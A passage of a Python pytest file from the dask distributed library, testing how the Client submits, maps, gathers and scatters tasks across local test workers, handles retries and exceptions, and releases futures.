from distributed.utils import is_valid_xml, mp_context, sync, tmp_text
from distributed.utils_test import (
TaskStateMetadataPlugin,
_UnhashableCallable,
async_wait_for,
asyncinc,
captured_logger,
cluster,
dec,
div,
double,
gen_cluster,
gen_test,
geninc,
get_cert,
inc,
map_varying,
nodebug,
popen,
pristine_loop,
randominc,
save_sys_modules,
slowadd,
slowdec,
slowinc,
throws,
tls_only_security,
varying,
wait_for,
)
pytestmark = pytest.mark.ci1
@gen_cluster(client=True)
async def test_submit(c, s, a, b):
x = c.submit(inc, 10, key="x")
assert not x.done()
assert isinstance(x, Future)
assert x.client is c
result = await x
assert result == 11
assert x.done()
y = c.submit(inc, 20, key="y")
z = c.submit(add, x, y)
result = await z
assert result == 11 + 21
s.validate_state()
@gen_cluster(client=True)
async def test_map(c, s, a, b):
L1 = c.map(inc, range(5))
assert len(L1) == 5
assert isdistinct(x.key for x in L1)
assert all(isinstance(x, Future) for x in L1)
result = await L1[0]
assert result == inc(0)
assert len(s.tasks) == 5
L2 = c.map(inc, L1)
result = await L2[1]
assert result == inc(inc(1))
assert len(s.tasks) == 10
# assert L1[0].key in s.tasks[L2[0].key]
total = c.submit(sum, L2)
result = await total
assert result == sum(map(inc, map(inc, range(5))))
L3 = c.map(add, L1, L2)
result = await L3[1]
assert result == inc(1) + inc(inc(1))
L4 = c.map(add, range(3), range(4))
results = await c.gather(L4)
assert results == list(map(add, range(3), range(4)))
def f(x, y=10):
return x + y
L5 = c.map(f, range(5), y=5)
results = await c.gather(L5)
assert results == list(range(5, 10))
y = c.submit(f, 10)
L6 = c.map(f, range(5), y=y)
results = await c.gather(L6)
assert results == list(range(20, 25))
s.validate_state()
@gen_cluster(client=True)
async def test_map_empty(c, s, a, b):
L1 = c.map(inc, [], pure=False)
assert len(L1) == 0
results = await c.gather(L1)
assert results == []
@gen_cluster(client=True)
async def test_map_keynames(c, s, a, b):
futures = c.map(inc, range(4), key="INC")
assert all(f.key.startswith("INC") for f in futures)
assert isdistinct(f.key for f in futures)
futures2 = c.map(inc, [5, 6, 7, 8], key="INC")
assert [f.key for f in futures] != [f.key for f in futures2]
keys = ["inc-1", "inc-2", "inc-3", "inc-4"]
futures = c.map(inc, range(4), key=keys)
assert [f.key for f in futures] == keys
@gen_cluster(client=True)
async def test_map_retries(c, s, a, b):
args = [
[ZeroDivisionError("one"), 2, 3],
[4, 5, 6],
[ZeroDivisionError("seven"), ZeroDivisionError("eight"), 9],
]
x, y, z = c.map(*map_varying(args), retries=2)
assert await x == 2
assert await y == 4
assert await z == 9
x, y, z = c.map(*map_varying(args), retries=1, pure=False)
assert await x == 2
assert await y == 4
with pytest.raises(ZeroDivisionError, match="eight"):
await z
x, y, z = c.map(*map_varying(args), retries=0, pure=False)
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 4
with pytest.raises(ZeroDivisionError, match="seven"):
await z
@gen_cluster(client=True)
async def test_map_batch_size(c, s, a, b):
result = c.map(inc, range(100), batch_size=10)
result = await c.gather(result)
assert result == list(range(1, 101))
result = c.map(add, range(100), range(100), batch_size=10)
result = await c.gather(result)
assert result == list(range(0, 200, 2))
# mismatch shape
result = c.map(add, range(100, 200), range(10), batch_size=2)
result = await c.gather(result)
assert result == list(range(100, 120, 2))
@gen_cluster(client=True)
async def test_custom_key_with_batches(c, s, a, b):
"""Test of <https://github.com/dask/distributed/issues/4588>"""
futs = c.map(
lambda x: x**2,
range(10),
batch_size=5,
key=[str(x) for x in range(10)],
)
assert len(futs) == 10
await wait(futs)
@gen_cluster(client=True)
async def test_compute_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check for varying() use
x = c.compute(delayed(varying(args))())
with pytest.raises(ZeroDivisionError, match="one"):
await x
# Same retries for all
x = c.compute(delayed(varying(args))(), retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
await x
x = c.compute(delayed(varying(args))(), retries=2)
assert await x == 3
args.append(4)
x = c.compute(delayed(varying(args))(), retries=2)
assert await x == 3
@gen_cluster(client=True)
async def test_compute_retries_annotations(c, s, a, b):
# Per-future retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
with dask.annotate(retries=2):
x = delayed(varying(xargs))()
y = delayed(varying(yargs))()
x, y = c.compute([x, y], optimize_graph=False)
gc.collect()
assert await x == 30
with pytest.raises(ZeroDivisionError, match="five"):
await y
x = delayed(varying(xargs))()
with dask.annotate(retries=2):
y = delayed(varying(yargs))()
z = delayed(varying(zargs))()
x, y, z = c.compute([x, y, z], optimize_graph=False)
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 70
assert await z == 80
def test_retries_get(c):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
assert x.compute(retries=5) == 3
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
with pytest.raises(ZeroDivisionError):
x.compute()
@gen_cluster(client=True)
async def test_compute_persisted_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check
x = c.persist(delayed(varying(args))())
fut = c.compute(x)
with pytest.raises(ZeroDivisionError, match="one"):
await fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
await fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=2)
assert await fut == 3
args.append(4)
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=3)
assert await fut == 3
@gen_cluster(client=True)
async def test_persist_retries(c, s, a, b):
# Same retries for all
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = c.persist(delayed(varying(args))(), retries=1)
x = c.compute(x)
with pytest.raises(ZeroDivisionError, match="two"):
await x
x = c.persist(delayed(varying(args))(), retries=2)
x = c.compute(x)
assert await x == 3
@gen_cluster(client=True)
async def test_persist_retries_annotations(c, s, a, b):
# Per-key retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
x = delayed(varying(xargs))()
with dask.annotate(retries=2):
y = delayed(varying(yargs))()
z = delayed(varying(zargs))()
x, y, z = c.persist([x, y, z], optimize_graph=False)
x, y, z = c.compute([x, y, z])
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 70
assert await z == 80
@gen_cluster(client=True)
async def test_retries_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
assert y == 100
@gen_cluster(client=True)
async def test_future_repr(c, s, a, b):
pd = pytest.importorskip("pandas")
x = c.submit(inc, 10)
y = c.submit(pd.DataFrame, {"x": [1, 2, 3]})
await x
await y
for func in [repr, lambda x: x._repr_html_()]:
assert str(x.key) in func(x)
assert str(x.status) in func(x)
assert str(x.status) in repr(c.futures[x.key])
assert "int" in func(x)
assert "pandas" in func(y)
assert "DataFrame" in func(y)
@gen_cluster(client=True)
async def test_future_tuple_repr(c, s, a, b):
da = pytest.importorskip("dask.array")
y = da.arange(10, chunks=(5,)).persist()
f = futures_of(y)[0]
for func in [repr, lambda x: x._repr_html_()]:
for k in f.key:
assert str(k) in func(f)
@gen_cluster(client=True)
async def test_Future_exception(c, s, a, b):
x = c.submit(div, 1, 0)
result = await x.exception()
assert isinstance(result, ZeroDivisionError)
x = c.submit(div, 1, 1)
result = await x.exception()
assert result is None
def test_Future_exception_sync(c):
x = c.submit(div, 1, 0)
assert isinstance(x.exception(), ZeroDivisionError)
x = c.submit(div, 1, 1)
assert x.exception() is None
@gen_cluster(client=True)
async def test_Future_release(c, s, a, b):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
await x
x.release()
await asyncio.sleep(0)
assert not c.futures
x = c.submit(slowinc, 1, delay=0.5)
x.release()
await asyncio.sleep(0)
assert not c.futures
x = c.submit(div, 1, 0)
await x.exception()
x.release()
await asyncio.sleep(0)
assert not c.futures
def test_Future_release_sync(c):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
x.result()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(slowinc, 1, delay=0.8)
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(div, 1, 0)
x.exception()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
def test_short_tracebacks(loop, c):
tblib = pytest.importorskip("tblib")
future = c.submit(div, 1, 0)
try:
future.result()
except Exception:
_, _, tb = sys.exc_info()
tb = tblib.Traceback(tb).to_dict()
n = 0
while tb is not None:
n += 1
tb = tb["tb_next"]
assert n < 5
@gen_cluster(client=True)
async def test_map_naming(c, s, a, b):
L1 = c.map(inc, range(5))
L2 = c.map(inc, range(5))
assert [x.key for x in L1] == [x.key for x in L2]
L3 = c.map(inc, [1, 1, 1, 1])
assert len({x._state for x in L3}) == 1
L4 = c.map(inc, [1, 1, 1, 1], pure=False)
assert len({x._state for x in L4}) == 4
@gen_cluster(client=True)
async def test_submit_naming(c, s, a, b):
a = c.submit(inc, 1)
b = c.submit(inc, 1)
assert a._state is b._state
c = c.submit(inc, 1, pure=False)
assert c.key != a.key
@gen_cluster(client=True)
async def test_exceptions(c, s, a, b):
x = c.submit(div, 1, 2)
result = await x
assert result == 1 / 2
x = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await x
x = c.submit(div, 10, 2) # continues to operate
result = await x
assert result == 10 / 2
@gen_cluster()
async def test_gc(s, a, b):
c = await Client(s.address, asynchronous=True)
x = c.submit(inc, 10)
await x
assert s.tasks[x.key].who_has
x.__del__()
await async_wait_for(
lambda: x.key not in s.tasks or not s.tasks[x.key].who_has, timeout=0.3
)
await c.close()
def test_thread(c):
x = c.submit(inc, 1)
assert x.result() == 2
x = c.submit(slowinc, 1, delay=0.3)
with pytest.raises(TimeoutError):
x.result(timeout="10 ms")
assert x.result() == 2
def test_sync_exceptions(c):
x = c.submit(div, 10, 2)
assert x.result() == 5
y = c.submit(div, 10, 0)
try:
y.result()
assert False
except ZeroDivisionError:
pass
z = c.submit(div, 10, 5)
assert z.result() == 2
@gen_cluster(client=True)
async def test_gather(c, s, a, b):
x = c.submit(inc, 10)
y = c.submit(inc, x)
result = await c.gather(x)
assert result == 11
result = await c.gather([x])
assert result == [11]
result = await c.gather({"x": x, "y": [y]})
assert result == {"x": 11, "y": [12]}
@gen_cluster(client=True)
async def test_gather_mismatched_client(c, s, a, b):
c2 = await Client(s.address, asynchronous=True)
x = c.submit(inc, 10)
y = c2.submit(inc, 5)
with pytest.raises(ValueError, match="Futures created by another client"):
await c.gather([x, y])
@gen_cluster(client=True)
async def test_gather_lost(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
await a.close()
with pytest.raises(Exception):
await c.gather([x, y])
def test_gather_sync(c):
x = c.submit(inc, 1)
assert c.gather(x) == 2
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
c.gather([x, y])
[xx] = c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True)
async def test_gather_strict(c, s, a, b):
x = c.submit(div, 2, 1)
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await c.gather([x, y])
[xx] = await c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_gather_skip(c, s, a):
x = c.submit(div, 1, 0, priority=10)
y = c.submit(slowinc, 1, delay=0.5)
with captured_logger(logging.getLogger("distributed.scheduler")) as sched:
with captured_logger(logging.getLogger("distributed.client")) as client:
L = await c.gather([x, y], errors="skip")
assert L == [2]
assert not client.getvalue()
assert not sched.getvalue()
@gen_cluster(client=True)
async def test_limit_concurrent_gathering(c, s, a, b):
futures = c.map(inc, range(100))
await c.gather(futures)
assert len(a.outgoing_transfer_log) + len(b.outgoing_transfer_log) < 100
@gen_cluster(client=True)
async def test_get(c, s, a, b):
future = c.get({"x": (inc, 1)}, "x", sync=False)
assert isinstance(future, Future)
result = await future
assert result == 2
futures = c.get({"x": (inc, 1)}, ["x"], sync=False)
assert isinstance(futures[0], Future)
result = await c.gather(futures)
assert result == [2]
futures = c.get({}, [], sync=False)
result = await c.gather(futures)
assert result == []
result = await c.get(
{("x", 1): (inc, 1), ("x", 2): (inc, ("x", 1))}, ("x", 2), sync=False
)
assert result == 3
def test_get_sync(c):
assert c.get({"x": (inc, 1)}, "x") == 2
def test_no_future_references(c):
from weakref import WeakSet
ws = WeakSet()
futures = c.map(inc, range(10))
ws.update(futures)
del futures
import gc
gc.collect()
start = time()
while list(ws):
sleep(0.01)
assert time() < start + 30
def test_get_sync_optimize_graph_passes_through(c):
bag = db.range(10, npartitions=3).map(inc)
dask.compute(bag.sum(), optimize_graph=False)
@gen_cluster(client=True)
async def test_gather_errors(c, s, a, b):
def f(a, b):
raise TypeError
def g(a, b):
raise AttributeError
future_f = c.submit(f, 1, 2)
future_g = c.submit(g, 1, 2)
with pytest.raises(TypeError):
await c.gather(future_f)
with pytest.raises(AttributeError):
await c.gather(future_g)
await a.close()
@gen_cluster(client=True)
async def test_wait(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
z = c.submit(inc, 2)
done, not_done = await wait([x, y, z])
assert done == {x, y, z}
assert not_done == set()
assert x.status == y.status == "finished"
@gen_cluster(client=True)
async def test_wait_first_completed(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, 1)
z = c.submit(inc, 2)
done, not_done = await wait([x, y, z], return_when="FIRST_COMPLETED")
assert done == {z}
assert not_done == {x, y}
assert z.status == "finished"
assert x.status == "pending"
assert y.status == "pending"
@gen_cluster(client=True)
async def test_wait_timeout(c, s, a, b):
future = c.submit(sleep, 0.3)
with pytest.raises(TimeoutError):
await wait(future, timeout=0.01)
def test_wait_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
done, not_done = wait([x, y])
assert done == {x, y}
assert not_done == set()
assert x.status == y.status == "finished"
future = c.submit(sleep, 0.3)
with pytest.raises(TimeoutError):
wait(future, timeout=0.01)
def test_wait_informative_error_for_timeouts(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
try:
wait(x, y)
except Exception as e:
assert "timeout" in str(e)
assert "list" in str(e)
@gen_cluster(client=True)
async def test_garbage_collection(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
assert c.refcount[x.key] == 2
x.__del__()
await asyncio.sleep(0)
assert c.refcount[x.key] == 1
z = c.submit(inc, y)
y.__del__()
await asyncio.sleep(0)
result = await z
assert result == 3
ykey = y.key
y.__del__()
await asyncio.sleep(0)
assert ykey not in c.futures
@gen_cluster(client=True)
async def test_garbage_collection_with_scatter(c, s, a, b):
[future] = await c.scatter([1])
assert future.key in c.futures
assert future.status == "finished"
assert s.who_wants[future.key] == {c.id}
key = future.key
assert c.refcount[key] == 1
future.__del__()
await asyncio.sleep(0)
assert c.refcount[key] == 0
while key in s.tasks and s.tasks[key].who_has:
await asyncio.sleep(0.1)
@gen_cluster(client=True)
async def test_recompute_released_key(c, s, a, b):
x = c.submit(inc, 100)
result1 = await x
xkey = x.key
del x
import gc
gc.collect()
await asyncio.sleep(0)
assert c.refcount[xkey] == 0
# 1 second batching needs a second action to trigger
while xkey in s.tasks and s.tasks[xkey].who_has or xkey in a.data or xkey in b.data:
await asyncio.sleep(0.1)
x = c.submit(inc, 100)
assert x.key in c.futures
result2 = await x
assert result1 == result2
@pytest.mark.slow
@gen_cluster(client=True)
async def test_long_tasks_dont_trigger_timeout(c, s, a, b):
from time import sleep
x = c.submit(sleep, 3)
await x
@pytest.mark.skip
@gen_cluster(client=True)
async def test_missing_data_heals(c, s, a, b):
a.validate = False
b.validate = False
x = c.submit(inc, 1)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([x, y, z])
# Secretly delete y's key
if y.key in a.data:
del a.data[y.key]
a.release_key(y.key, stimulus_id="test")
if y.key in b.data:
del b.data[y.key]
b.release_key(y.key, stimulus_id="test")
await asyncio.sleep(0)
w = c.submit(add, y, z)
result = await w
assert result == 3 + 4
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_missing_data(c, s, a, b):
a.validate = False
b.validate = False
x, y, z = c.map(inc, range(3))
await wait([x, y, z]) # everything computed
for f in [x, y]:
for w in [a, b]:
if f.key in w.data:
del w.data[f.key]
await asyncio.sleep(0)
w.release_key(f.key, stimulus_id="test")
xx, yy, zz = await c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_nested_missing_data(c, s, a, b):
a.validate = False
b.validate = False
w = c.submit(inc, 1)
x = c.submit(inc, w)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([z])
for worker in [a, b]:
for datum in [y, z]:
if datum.key in worker.data:
del worker.data[datum.key]
await asyncio.sleep(0)
worker.release_key(datum.key, stimulus_id="test")
result = await c.gather([z])
assert result == [inc(inc(inc(inc(1))))]
@gen_cluster(client=True)
async def test_tokenize_on_futures(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
tok = tokenize(x)
assert tokenize(x) == tokenize(x)
assert tokenize(x) == tokenize(y)
c.futures[x.key].finish()
assert tok == tokenize(y)
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_submit(c, s, a, b):
x = c.submit(inc, 1, workers={a.ip})
y = c.submit(inc, x, workers={b.ip})
await wait([x, y])
assert s.host_restrictions[x.key] == {a.ip}
assert x.key in a.data
assert s.host_restrictions[y.key] == {b.ip}
assert y.key in b.data
@gen_cluster(client=True)
async def test_restrictions_ip_port(c, s, a, b):
x = c.submit(inc, 1, workers={a.address})
y = c.submit(inc, x, workers={b.address})
await wait([x, y])
assert s.worker_restrictions[x.key] == {a.address}
assert x.key in a.data
assert s.worker_restrictions[y.key] == {b.address}
assert y.key in b.data
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_map(c, s, a, b):
L = c.map(inc, range(5), workers={a.ip})
await wait(L)
assert set(a.data) == {x.key for x in L}
assert not b.data
for x in L:
assert s.host_restrictions[x.key] == {a.ip}
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_get(c, s, a, b):
dsk = {"x": 1, "y": (inc, "x"), "z": (inc, "y")}
futures = c.get(dsk, ["y", "z"], workers=a.ip, sync=False)
result = await c.gather(futures)
assert result == [2, 3]
assert "y" in a.data
assert "z" in a.data
assert len(b.data) == 0
@gen_cluster(client=True)
async def test_restrictions_get_annotate(c, s, a, b):
x = 1
with dask.annotate(workers=a.address):
y = delayed(inc)(x)
with dask.annotate(workers=b.address):
z = delayed(inc)(y)
futures = c.get(z.__dask_graph__(), [y.key, z.key], sync=False)
result = await c.gather(futures)
assert result == [2, 3]
assert y.key in a.data
assert z.key in b.data
@gen_cluster(client=True)
async def dont_test_bad_restrictions_raise_exception(c, s, a, b):
z = c.submit(inc, 2, workers={"bad-address"})
try:
await z
assert False
except ValueError as e:
assert "bad-address" in str(e)
assert z.key in str(e)
@gen_cluster(client=True)
async def test_remove_worker(c, s, a, b):
L = c.map(inc, range(20))
await wait(L)
await b.close()
assert b.address not in s.workers
result = await c.gather(L)
assert result == list(map(inc, range(20)))
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_errors_dont_block(c, s, w):
L = [c.submit(inc, 1), c.submit(throws, 1), c.submit(inc, 2), c.submit(throws, 2)]
while not (L[0].status == L[2].status == "finished"):
await asyncio.sleep(0.01)
result = await c.gather([L[0], L[2]])
assert result == [2, 3]
@gen_cluster(client=True)
async def test_submit_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
x = c.submit(assert_list, [1, 2, 3])
result = await x
assert result
x = c.submit(assert_list, [1, 2, 3], z=[4, 5, 6])
result = await x
assert result
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(assert_list, [x, y])
result = await z
assert result
@gen_cluster(client=True)
async def test_map_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
L = c.map(assert_list, [[1, 2, 3], [4]])
result = await c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], z=[10])
result = await c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], [[]] * 3)
result = await c.gather(L)
assert all(result)
@gen_cluster()
async def test_two_consecutive_clients_share_results(s, a, b):
c = await Client(s.address, asynchronous=True)
x = c.submit(random.randint, 0, 1000, pure=True)
xx = await x
f = await Client(s.address, asynchronous=True)
y = f.submit(random.randint, 0, 1000, pure=True)
yy = await y
assert xx == yy
await c.close()
await f.close()
@gen_cluster(client=True)
async def test_submit_then_get_with_Future(c, s, a, b):
x = c.submit(slowinc, 1)
dsk = {"y": (inc, x)}
result = await c.get(dsk, "y", sync=False)
assert result == 3
@gen_cluster(client=True)
async def test_aliases(c, s, a, b):
x = c.submit(inc, 1)
dsk = {"y": x}
result = await c.get(dsk, "y", sync=False)
assert result == 2
@gen_cluster(client=True)
async def test_aliases_2(c, s, a, b):
dsk_keys = [
({"x": (inc, 1), "y": "x", "z": "x", "w": (add, "y", "z")}, ["y", "w"]),
({"x": "y", "y": 1}, ["x"]),
({"x": 1, "y": "x", "z": "y", "w": (inc, "z")}, ["w"]),
]
for dsk, keys in dsk_keys:
result = await c.gather(c.get(dsk, keys, sync=False))
assert list(result) == list(dask.get(dsk, keys))
await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_scatter(c, s, a, b):
d = await c.scatter({"y": 20})
assert isinstance(d["y"], Future)
assert a.data.get("y") == 20 or b.data.get("y") == 20
y_who_has = s.get_who_has(keys=["y"])["y"]
assert a.address in y_who_has or b.address in y_who_has
assert s.get_nbytes(summary=False) == {"y": sizeof(20)}
yy = await c.gather([d["y"]])
assert yy == [20]
[x] = await c.scatter([10])
assert isinstance(x, Future)
assert a.data.get(x.key) == 10 or b.data.get(x.key) == 10
xx = await c.gather([x])
x_who_has = s.get_who_has(keys=[x.key])[x.key]
assert s.tasks[x.key].who_has
assert (
s.workers[a.address] in s.tasks[x.key].who_has
or s.workers[b.address] in s.tasks[x.key].who_has
)
assert s.get_nbytes(summary=False) == {"y": sizeof(20), x.key: sizeof(10)}
assert xx == [10]
z = c.submit(add, x, d["y"]) # submit works on Future
result = await z
assert result == 10 + 20
result = await c.gather([z, x])
assert result == [30, 10]
@gen_cluster(client=True)
async def test_scatter_types(c, s, a, b):
d = await c.scatter({"x": 1})
assert isinstance(d, dict)
assert list(d) == ["x"]
for seq in [[1], (1,), {1}, frozenset([1])]:
L = await c.scatter(seq)
assert isinstance(L, type(seq))
assert len(L) == 1
s.validate_state()
seq = await c.scatter(range(5))
assert isinstance(seq, list)
assert len(seq) == 5
s.validate_state()
@gen_cluster(client=True)
async def test_scatter_non_list(c, s, a, b):
x = await c.scatter(1)
assert isinstance(x, Future)
result = await x
assert result == 1
@gen_cluster(client=True)
async def test_scatter_tokenize_local(c, s, a, b):
from dask.base import normalize_token
class MyObj:
pass
L = []
@normalize_token.register(MyObj)
def f(x):
L.append(x)
return "x"
obj = MyObj()
future = await c.scatter(obj)
assert L and L[0] is obj
@gen_cluster(client=True)
async def test_scatter_singletons(c, s, a, b):
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
for x in [1, np.ones(5), pd.DataFrame({"x": [1, 2, 3]})]:
future = await c.scatter(x)
result = await future
assert str(result) == str(x)
@gen_cluster(client=True)
async def test_scatter_typename(c, s, a, b):
future = await c.scatter(123)
assert future.key.startswith("int")
@gen_cluster(client=True)
async def test_scatter_hash(c, s, a, b):
x = await c.scatter(123)
y = await c.scatter(123)
assert x.key == y.key
z = await c.scatter(123, hash=False)
assert z.key != y.key
@gen_cluster(client=True)
async def test_scatter_hash_2(c, s, a, b):
[a] = await c.scatter([1])
[b] = await c.scatter([1])
assert a.key == b.key
s.validate_state()
@gen_cluster(client=True)
async def test_get_releases_data(c, s, a, b):
await c.gather(c.get({"x": (inc, 1)}, ["x"], sync=False))
import gc
gc.collect()
while c.refcount["x"]:
await asyncio.sleep(0.01)
def test_current(s, a, b):
with Client(s["address"]) as c:
assert Client.current() is c
with pytest.raises(ValueError):
Client.current()
with Client(s["address"]) as c:
assert Client.current() is c
def test_global_clients(loop):
assert _get_global_client() is None
with pytest.raises(ValueError):
default_client()
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert _get_global_client() is c
assert default_client() is c
with Client(s["address"], loop=loop) as f:
assert _get_global_client() is f
assert default_client() is f
assert default_client(c) is c
assert default_client(f) is f
assert _get_global_client() is None
@gen_cluster(client=True)
async def test_exception_on_exception(c, s, a, b):
x = c.submit(lambda: 1 / 0)
y = c.submit(inc, x)
with pytest.raises(ZeroDivisionError):
await y
z = c.submit(inc, y)
with pytest.raises(ZeroDivisionError):
await z
@gen_cluster(client=True)
async def test_get_task_prefix_states(c, s, a, b):
x = await c.submit(inc, 1)
res = s.get_task_prefix_states()
data = {
"inc": {
"erred": 0,
"memory": 1,
"processing": 0,
"released": 0,
"waiting": 0,
}
}
assert res == data
del x
while s.get_task_prefix_states() == data:
await asyncio.sleep(0.01)
res = s.get_task_prefix_states()
assert res == {}
@gen_cluster(client=True)
async def test_get_nbytes(c, s, a, b):
[x] = await c.scatter([1])
assert s.get_nbytes(summary=False) == {x.key: sizeof(1)}
y = c.submit(inc, x)
await y
assert s.get_nbytes(summary=False) == {x.key: sizeof(1), y.key: sizeof(2)}
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_nbytes_determines_worker(c, s, a, b):
x = c.submit(identity, 1, workers=[a.ip])
y = c.submit(identity, tuple(range(100)), workers=[b.ip])
await c.gather([x, y])
z = c.submit(lambda x, y: None, x, y)
await z
assert s.tasks[z.key].who_has == {s.workers[b.address]}
@gen_cluster(client=True)
async def test_if_intermediates_clear_on_error(c, s, a, b):
x = delayed(div, pure=True)(1, 0)
y = delayed(div, pure=True)(1, 2)
z = delayed(add, pure=True)(x, y)
f = c.compute(z)
with pytest.raises(ZeroDivisionError):
await f
s.validate_state()
assert not any(ts.who_has for ts in s.tasks.values())
@gen_cluster(
client=True, config={"distributed.scheduler.default-task-durations": {"f": "1ms"}}
)
async def test_pragmatic_move_small_data_to_large_data(c, s, a, b):
np = pytest.importorskip("numpy")
lists = c.map(np.ones, [10000] * 10, pure=False)
sums = c.map(np.sum, lists)
total = c.submit(sum, sums)
def f(x, y):
return None
results = c.map(f, lists, [total] * 10)
await wait([total])
await wait(results)
assert (
sum(
s.tasks[r.key].who_has.issubset(s.tasks[l.key].who_has)
for l, r in zip(lists, results)
)
>= 9
)
@gen_cluster(client=True)
async def test_get_with_non_list_key(c, s, a, b):
dsk = {("x", 0): (inc, 1), 5: (inc, 2)}
x = await c.get(dsk, ("x", 0), sync=False)
y = await c.get(dsk, 5, sync=False)
assert x == 2
assert y == 3
@gen_cluster(client=True)
async def test_get_with_error(c, s, a, b):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
await c.get(dsk, "y", sync=False)
def test_get_with_error_sync(c):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
c.get(dsk, "y")
@gen_cluster(client=True)
async def test_directed_scatter(c, s, a, b):
await c.scatter([1, 2, 3], workers=[a.address])
assert len(a.data) == 3
assert not b.data
await c.scatter([4, 5], workers=[b.name])
assert len(b.data) == 2
def test_directed_scatter_sync(c, s, a, b, loop):
futures = c.scatter([1, 2, 3], workers=[b["address"]])
has_what = sync(loop, c.scheduler.has_what)
assert len(has_what[b["address"]]) == len(futures)
assert len(has_what[a["address"]]) == 0
@gen_cluster(client=True)
async def test_scatter_direct(c, s, a, b):
future = await c.scatter(123, direct=True)
assert future.key in a.data or future.key in b.data
assert s.tasks[future.key].who_has
assert future.status == "finished"
result = await future
assert result == 123
assert not s.counters["op"].components[0]["scatter"]
result = await future
assert not s.counters["op"].components[0]["gather"]
result = await c.gather(future)
assert not s.counters["op"].components[0]["gather"]
@gen_cluster()
async def test_scatter_direct_2(s, a, b):
c = await Client(s.address, asynchronous=True, heartbeat_interval=10)
last = s.clients[c.id].last_seen
while s.clients[c.id].last_seen == last:
await asyncio.sleep(0.10)
await c.close()
@gen_cluster(client=True)
async def test_scatter_direct_numpy(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.ones(5)
future = await c.scatter(x, direct=True)
result = await future
assert np.allclose(x, result)
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True)
async def test_scatter_direct_broadcast(c, s, a, b):
future2 = await c.scatter(456, direct=True, broadcast=True)
assert future2.key in a.data
assert future2.key in b.data
assert s.tasks[future2.key].who_has == {s.workers[a.address], s.workers[b.address]}
result = await future2
assert result == 456
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_balanced(c, s, *workers):
futures = await c.scatter([1, 2, 3], direct=True)
assert sorted(len(w.data) for w in workers) == [0, 1, 1, 1]
